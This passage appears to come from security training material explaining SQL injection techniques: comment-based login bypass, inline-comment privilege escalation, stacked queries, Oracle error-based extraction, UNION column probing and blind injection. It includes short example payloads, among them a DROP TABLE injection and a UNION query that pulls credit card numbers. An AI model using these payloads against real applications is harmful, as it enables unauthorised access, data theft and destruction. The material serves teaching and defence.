▪ End-of-Line Comment
In this type of SQL injection, an attacker uses line comments in specific SQL injection inputs. Comments in a line of code are often denoted by (--), and they are ignored by the query. An attacker takes advantage of this commenting feature by writing a line of code that ends in a comment. The database will execute the code until it reaches the commented portion, after which it will ignore the rest of the query.
For example,
SELECT * FROM members WHERE username = 'admin'--' AND password = 'password'
With this query, an attacker can log in to an admin account without the password, as the database application will ignore the comments that begin immediately after username = 'admin'.
▪ Inline Comments
Attackers simplify an SQL injection attack by integrating multiple vulnerable inputs into a single query using in-line comments. This type of injection allows an attacker to bypass blacklisting, remove spaces, obfuscate, and determine database versions.
For example,
INSERT INTO Users (UserName, isAdmin, Password) VALUES ('".$username."', 0, '".$password."')
is a dynamic query that prompts a new user to enter a username and password. The attacker may provide malicious inputs as follows.
UserName = Attacker', 1, /*
Password = */'mypwd
After these malicious inputs are injected, the generated query gives the attacker administrator privileges:
INSERT INTO Users (UserName, isAdmin, Password) VALUES ('Attacker', 1, /*', 0, '*/'mypwd')
▪ Piggybacked Query
In a piggybacked SQL injection attack, an attacker injects an additional malicious query into the original query. This type of injection is generally performed on batched SQL queries. The original query remains unmodified, and the attacker's query is piggybacked on the original query. Owing to piggybacking, the DBMS receives multiple SQL queries. Attackers use a semicolon (;) as a query delimiter to separate the queries. After executing the original query, the DBMS recognizes the delimiter and then executes the piggybacked query. This type of attack is also known as a stacked queries attack. The intention of the attacker is to extract, add, modify, or delete data, execute remote commands, or perform a DoS attack.
For example, the original SQL query is as follows:
SELECT * FROM EMP WHERE EMP.EID = 1001 AND EMP.ENAME = 'Bob'
Now, the attacker concatenates the delimiter (;) and the malicious query to the original query as follows:
SELECT * FROM EMP WHERE EMP.EID = 1001 AND EMP.ENAME = 'Bob'; DROP TABLE DEPT;
After executing the first query and returning the resultant database rows, the DBMS recognizes the delimiter and executes the injected malicious query. Consequently, the DBMS drops the DEPT table from the database.


Error Based SQL Injection
Let us understand the details of error-based SQL injection. As discussed earlier, in error-based SQL injection, the attacker forces the database to return error messages in response to his/her inputs. Later, the attacker may analyze the error messages obtained from the underlying database to gather information that can be used for constructing the malicious query. The attacker uses this type of SQL injection technique when he/she is unable to exploit any other SQL injection techniques directly. The primary goal of this technique is to generate the error message from the database, which can be used to perform a successful SQL injection attack. Such exploitation may differ from one DBMS to another.
Consider the following SQL query:
SELECT * FROM products WHERE id_product=$id_product
Consider the request to a script that executes the query above:
http://www.example.com/product.php?id=10
The malicious request would be (e.g., Oracle 10g):
http://www.example.com/product.php?id=10||UTL_INADDR.GET_HOST_NAME((SELECT user FROM DUAL))--
In the aforementioned example, the tester concatenates the value 10 with the result of the function UTL_INADDR.GET_HOST_NAME. This Oracle function will try to return the hostname of the parameter passed to it, which is another query, i.e., the name of the user. When the database looks for a hostname with the user database name, it will fail and return an error message such as
ORA-292257: host SCOTT unknown
Then, the tester can manipulate the parameter passed to the GET_HOST_NAME() function and the result will be shown in the error message.

Union SQL Injection
In a UNION SQL injection, an attacker combines a forged query with a query requested by the user using a UNION clause. The result of the forged query will be appended to the result of the original query, which makes it possible to obtain the values of fields from other tables. Before running the UNION SQL injection, the attacker ensures that there is an equal number of columns taking part in the UNION query. To find the right number of columns, the attacker first launches a query using an ORDER BY clause followed by a number to indicate the number of database columns selected:
ORDER BY 10--
If the query is executed successfully and no error message appears, then the attacker will assume that 10 or more columns exist in the target database table. However, if the application displays an error message such as "Unknown column '10' in 'order clause'", then the attacker will assume that there are less than 10 columns in the target database table. Through trial and error, an attacker can learn the exact number of columns in the target database table.
Once the attacker learns the number of columns, the next step is to find the type of columns using a query such as
UNION SELECT 1,null,null--
If the query is executed successfully, then the attacker knows that the first column is of integer type and he/she can move on to learning the types of the other columns.
Once the attacker finds the right number of columns, the next step is to perform UNION SQL injection.
For example,
SELECT Name, Phone, Address FROM Users WHERE Id=$id
Now, set the following Id value:
$id=1 UNION ALL SELECT creditCardNumber,1,1 FROM CreditCardTable
The attacker now launches a UNION SQL injection query as follows:
SELECT Name, Phone, Address FROM Users WHERE Id=1 UNION ALL SELECT creditCardNumber,1,1 FROM CreditCardTable
The above query joins the result of the original query with all the credit card users.


Blind/Inferential SQL Injection
Blind SQL injection is used when a web application is vulnerable to an SQL injection but the results of the injection are not visible to the attacker. Blind SQL injection is identical to a normal SQL injection except that when an attacker attempts to exploit an application, he/she sees a generic custom page instead of a useful error message. In blind SQL injection, an attacker poses a true or false question to the database to determine whether the application is vulnerable to SQL injection.
A normal SQL injection attack is often possible when the developer uses generic error messages whenever an error has occurred in the database. Such generic messages may reveal sensitive information or give a path to the attacker to perform an SQL injection attack on the application. However, when developers turn off the generic error message for the application, it is difficult for the attacker to perform an SQL injection attack. Nevertheless, it is not impossible to exploit such an application with an SQL injection attack. Blind injection differs from normal SQL injection in the manner of retrieving data from the database. Attackers use blind SQL injection either to access sensitive data or to destroy data. Attackers can steal data by asking a series of true or false questions through SQL statements. The results of the injection are not visible to the attacker. This type of attack can become time-intensive because the database should generate a new statement for each newly recovered bit.
